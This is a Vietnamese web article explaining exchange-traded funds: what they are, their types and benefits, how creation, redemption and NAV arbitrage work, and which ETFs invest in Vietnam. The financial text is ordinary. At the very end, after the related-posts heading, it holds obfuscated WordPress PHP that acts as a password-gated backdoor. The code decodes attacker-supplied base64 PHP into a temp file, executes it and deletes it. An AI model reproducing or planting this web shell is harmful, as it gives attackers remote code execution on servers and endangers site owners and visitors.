Quỹ ETF là gì? Tổng quan về quỹ ETF trên TTCK Việt Nam

Trên thị trường chứng khoán Việt Nam, quỹ ETF dần trở nên phổ biến và quen thuộc đối với các nhà đầu tư. Nhiều quỹ ETF được giải ngân vào Việt Nam với quy mô khá lớn nên hoạt động cơ cấu của các quỹ này có ảnh hưởng mạnh mẽ đến diễn biến thị trường. Sau đây chúng ta hãy cùng tìm hiểu đôi nét về quỹ ETF là gì? Tổng quan về quỹ ETF trên thị trường chứng khoán Việt Nam.

Quỹ ETF là gì?

Quỹ ETF là gì? Tổng quan về quỹ ETF trên TTCK Việt Nam-1

ETF là viết tắt của Exchange Traded Fund dịch sang tiếng Việt là Quỹ hoán đổi danh mục. Đây là quỹ đầu tư với mục đích mô phỏng tỷ suất sinh lợi của chỉ số cổ phiếu, trái phiếu, hàng hóa hay một loại tài sản nào đó. Quỹ ETF vừa mang đặc điểm của một quỹ đầu tư đồng thời nó cũng mang đặc điểm của một cổ phiếu khi được niêm yết và gia dịch trên sàn chứng khoán.

Các nhà đầu tư thường hấp dẫn bởi quỹ ETF bởi đặc thù các mã ETF chịu chi phí thấp (lợi nhuận ròng cao hơn), nhưng lại được giao dịch mua bán như một mã chứng khoán trên thị trường.

ETF được xem là một hình thức quỹ đầu tư vào chỉ số, các danh mục của ETF gồm những chứng khoán được cơ cấu theo mức định sẵn của từng quỹ. Từ đó, các nhà đầu tư không cần phải lựa chọn cho mình cổ phiếu mà có thể trực tiếp mua chứng chỉ quỹ của quỹ ETF. Đây là một kiểu đầu tư thụ động.

Không phải lúc nào quỹ ETF cũng là an toàn mà đôi khi cũng xuất hiện những quỹ ETF chỉ số ngành mà rủi ro có thể là cả ngành sẽ bị suy thoái. Mặc dù vậy nhưng quỹ ETF được nhiều người lựa chọn bởi nó khá tiện lợi vì chi phí thấp và được đa dạng hóa tốt.

Các loại hình ETF

– Quỹ ETF mô phỏng chỉ số cổ phiếu: Phân loại và mô phỏng theo mức vốn, theo ngành, theo khu vực,…

– Quỹ ETF mô phỏng chỉ số hàng hóa: Phân loại và mô phỏng theo chỉ số vàng, nông sản, hàng hóa khác,…

Xem Thêm  Những bộ phim Việt Nam gắn liền với tuổi thơ 8x, 9x

– Quỹ ETF mô phỏng chỉ số tiền tệ: Phân loại và mô phỏng theo chỉ số đồng tiền của các nước đã phát triển.

– Quỹ ETF mô phỏng chỉ số công cụ nợ: Phân loại và mô phỏng chỉ số các hạng mục trái phiếu phát hành bởi chính phủ.

Tại thị trường chứng khoán Việt Nam hiện nay có khá nhiều quỹ ETF nhưng có 3 quỹ ngoại và 2 quỹ nội sau đay là có danh mục đàu tư tương đối lớn và có nhiều ảnh hưởng tới thị trường nhất:

Quỹ ETF là gì? Tổng quan về quỹ ETF trên TTCK Việt Nam-2

Lợi ích của quỹ ETF

Lợi ích đối với các nhà đầu tư

Quỹ ETF là một hình thức quỹ mở nhưng lại có ưu điểm của quỹ đóng và mở, thêm vào đó, quỹ ETF cũng hạn chế được nhược điểm của cả hai loại quỹ này. Cho nên quỹ ETF có tính minh bạch cao hơn, có danh mục đầu tư đa dạng và phù hợp với nhiều nhà đầu tư hơn.

Lợi ích đối với nền kinh tế

– Thứ nhất, quỹ ETF là một công cụ hiệu quả để xử lý nợ xấu và sở hữu chéo.

– Thứ hai, quỹ ETF là công cụ phòng chống khủng hoảng.

– Thứ ba, quỹ ETF làm tăng tính hấp dẫn cho thị trường chứng khoán đặc biệt là thị trường thứ cấp.

– Thứ tư, quỹ ETF làm thay đổi hành vi và văn hóa đầu tư.

– Thứ năm, quỹ ETF giúp thu hút vốn đầu tư gián tiếp nước ngoài, đặc biệt do cơ chế quỹ mở, nhà đầu tư nước ngoài không bị hạn chế sở hữu số lượng chứng chỉ quỹ nắm giữ.

Quỹ ETF hoạt động như thế nào?

Trên thị trường chứng khoán, quỹ ETF được giao dịch gần với giá trị tài sản ròng (NAV) trong suốt phiên giao dịch. Đa phần các quỹ ETF hoạt động dựa trên một số tham chiếu như chỉ số chứng khoán hoặc chỉ số trái phiếu.

Hoạt động của quỹ ETF khác với các loại quỹ truyền thống ở một số khía cạnh như:

– Quỹ ETF không bán chứng chỉ quỹ riêng lẻ trực tiếp cho nhà đầu tư, mà chỉ phát hành theo lô lớn. Ở Việt Nam, một lô đơn vị quỹ ETF gồm tối thiểu 100,000 chứng chỉ quỹ ETF.

– Nhà đầu tư không mua lô đơn vị quỹ bằng tiền mà thay vào đó mua các lô đơn vị quỹ ETF bằng danh mục chứng khoán cơ cấu – mô phỏng theo danh mục của chỉ số tham chiếu đã được chấp thuận. Các nhà đầu tư trực tiếp mua các lô đơn vị quỹ thường là những tổ chức đầu tư vào các đơn vị tạo lập quỹ. Đây là hoạt động trên thị trường sơ cấp.

Xem Thêm  Những bài thơ về ông bà hay, ý nghĩa nhất cuối đời còn lại

– Các nhà đầu tư sẽ bắt đầu thực hiện việc chia nhỏ các lô đơn vị quỹ ra và bán các chứng chỉ quỹ ETF trên thị trường thứ cấp. Những nhà đầu tư khác sẽ mua các đơn vị quỹ riêng lẻ thay vì mua lô lớn trên thị trường này.

– Nhà đầu tư muốn bán chứng chỉ quỹ sẽ có hai lựa chọn: hoặc là bán chứng chỉ quỹ riêng lẻ cho các nhà đầu tư khác trên thị trường thứ cấp; hoặc là bán các lô đơn vị quỹ ngược lại cho quỹ ETF.

Chứng chỉ quỷ ETF được định giá như thế nào?

Quỹ ETF là gì? Tổng quan về quỹ ETF trên TTCK Việt Nam-3

Những tổ chức phát hành sẽ tính toán và công bố giá trị tài sản ròng (NAV) của quỹ ETF hàng ngày dựa vào giá đóng cửa của chứng khoán cơ cáu trong danh mục sau khi cộng vào các lệ phí và chi phí.

Trong một phiên giao dịch, thị giá chứng chỉ quỹ có thể thay đổi liên tục do sự dao động của giá cổ phiếu trong danh mục đầu tư hay nhu cầu của nhà đầu tư. Tuy nhiên, cơ chế kinh doanh chênh lệch giá (arbitrage) thường giữ thị giá chứng chỉ quỹ ETF gần với NAV của nó, cụ thể:

– Nếu giá ETF cao hơn giá trị NAV, thì người tham gia kinh doanh arbitrage có thể mua các chứng khoán cơ cấu để đổi lấy đơn vị quỹ ETF và bán nó trên thị trường chứng khoán để kiếm lợi nhuận.

– Nếu giá ETF thấp hơn giá trị NAV, thì người tham gia kinh doanh arbitrage có thể mua các đơn vị quỹ ETF trên thị trường chứng khoán để đổi lấy chứng khoán cơ cấu, và sau đó bán những cổ phiếu riêng lẻ trên thị trường để kiếm lợi nhuận.

Hoạt động arbitrage giữa các thành viên lập quỹ và tổ chức tạo lập thị trường sẽ đảm bảo giá chứng chỉ quỹ ETF liên hệ chặt chẽ với giá của các chứng khoán cơ cấu.

Xem Thêm  Những bộ phim hay nhất của Son Ye Jin không thể bỏ qua

Các quỹ ETF ở Việt Nam

Hiện nay trên thị trường chứng khoán, các quỹ ETF giải ngân vào Việt Nam có quy mô khá lớn, có thể lên đến vài trăm triệu USD. Cho nên, hoạt động cơ cấu của các quỹ ETF có ảnh hưởng khá lớn đến diễn biến thị trường tại Việt Nam. Trên thị trường chứng khoán Việt Nam, có khá nhiều quỹ ETF đang hoạt động như:

Quỹ ETF là gì? Tổng quan về quỹ ETF trên TTCK Việt Nam-4

– Quỹ ETF VFMVN30: Mục tiêu của quỹ ETF VFMVN30 là mô phỏng gần nhất về biến động của chỉ số tham chiếu VN30 sau khi trừ đi chi phí quỹ. Chỉ số VN30 là chỉ số giá do Sở giao dịch Chứng khoán Thành phố Hồ Chí Minh xây dựng và quản lý.

– Quỹ VanEck Vectors Vietnam ETF (VNM): Chứng chỉ VNM rất phổ biến đối với các nhà đầu tư Việt Nam. Các công ty thành lập tại Việt Nam có một phần hai doanh thu tại Việt Nam hoặc tài sản của họ tại Việt Nam chiếm một nửa thì sẽ đạt điều kiện cần để chứng chỉ quỹ này quyết định thêm vào danh mục hoán đổi của họ. Chi phí quỹ khá cao và rủi ro cũng rất cao.

– Quỹ Invesco Frontier Markets ETF (FRN): Quỹ FRN có 9% tài sản của mình tại các doanh nghiệp Việt Nam và đầu tư vào quỹ ETF khác cùng với các thị trường ở những quốc gia lân cận. FRN phù hợp cho các nhà đầu tư quan tâm đến việc bỏ tiền vào những công ty Việt Nam những vẫn muốn tiếp xúc đầu tư với các thị trường mới nổi khác.

– Quỹ FTSE Vietnam Index ETF: Quỹ này mô phỏng chỉ số FTSE Vietnam, đây là một trong 2 chỉ số do FTSE Group xây dựng trước đó.

– Columbia Beyond BRICs ETF (BBRC): Quỹ này tập trung đầu tư vào các thị trường đang phát triển như Brazil, Nga, Ấn Độ, Trung Quốc. Quỹ này mô phỏng theo chỉ số FTSE Beyond BRICs và giư ít nhất 80% tài sản của nó trong công ty nằm trong chỉ số này.

>>> Xem thêm: Cổ phiếu quỹ là gì? Công ty có nên mua lại cổ phiếu quỹ?

Quỹ ETF là gì? Trên đây là những thông tin tổng quan về quỹ ETF trên thị trường chứng khoán Việt Nam. Hi vọng những thông tin này sẽ bổ ích. Cám ơn đã theo dõi!

Bài Liên Quan:

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}